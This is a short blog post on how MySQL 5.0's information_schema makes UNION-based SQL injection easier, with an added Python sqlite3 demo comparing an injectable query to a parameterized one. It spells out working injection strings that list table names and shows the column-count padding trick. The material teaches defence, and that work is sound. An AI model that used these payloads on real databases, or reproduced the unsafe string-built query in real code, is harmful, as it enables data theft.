Morgan Tocker @ 2007-12-15 15:22:00
Entry tags: mysql, php
I [heart] information_schema
With MySQL 5.0, it's much easier to do SQL injection attacks, because you can use UNION against information_schema. You couldn't do this with the old SHOW commands.
i.e.
SELECT * FROM users WHERE id = $id;
becomes:
SELECT * FROM users WHERE id = 0 UNION SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() group by table_schema;
The rule for a UNION in MySQL is that the second query must have the same number of columns as the first query. In this case, you can just keep changing it until you get the column count right:
SELECT group_concat(table_name), 1, 2, 3, 4 FROM information_schema.tables WHERE table_schema=DATABASE() group by table_schema;
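As an added example (not from the original post), here is the interpolated query above next to its parameterized fix. It assumes an in-memory sqlite3 database as a stand-in for MySQL, with sqlite_master playing the role of information_schema.tables, and a constructed three-column users table, so the column-padding rule from the post applies in the same way.

```python
import sqlite3

# Constructed stand-in for the post's MySQL setup: sqlite3 so it runs offline,
# with sqlite_master standing in for information_schema.tables (both list the
# database's table names).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, name TEXT, email TEXT);
        CREATE TABLE secrets (id INTEGER, token TEXT);
        INSERT INTO users VALUES (1, 'alice', 'alice@example.org');
    """)
    return conn

def lookup_unsafe(conn, user_id):
    # Mirrors the post's "WHERE id = $id": the value is pasted straight into the
    # SQL text, so a value such as "0 UNION SELECT ..." becomes part of the query.
    sql = "SELECT id, name, email FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchall()

def lookup_safe(conn, user_id):
    # Hardened form: a bound parameter is always treated as data, never as SQL.
    # A non-numeric value simply matches no row.
    sql = "SELECT id, name, email FROM users WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchall()

# The users query selects three columns, so the appended SELECT needs three too;
# the "1, 2" padding is the column-count adjustment the post describes.
INJECTED = "0 UNION SELECT group_concat(name), 1, 2 FROM sqlite_master WHERE type='table'"

def demo():
    conn = make_db()
    leaked = lookup_unsafe(conn, INJECTED)  # table names come back as a row
    safe = lookup_safe(conn, INJECTED)      # bound value: no rows, no leak
    return leaked, safe

if __name__ == "__main__":
    leaked, safe = demo()
    print("unsafe:", leaked)  # [('users,secrets', 1, 2)]
    print("safe:  ", safe)    # []
```

The same query log line that shows the leak (a UNION naming information_schema) is also the thing to alert on in MySQL's general or audit log while the code fix is rolled out.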
I presented on these types of attacks here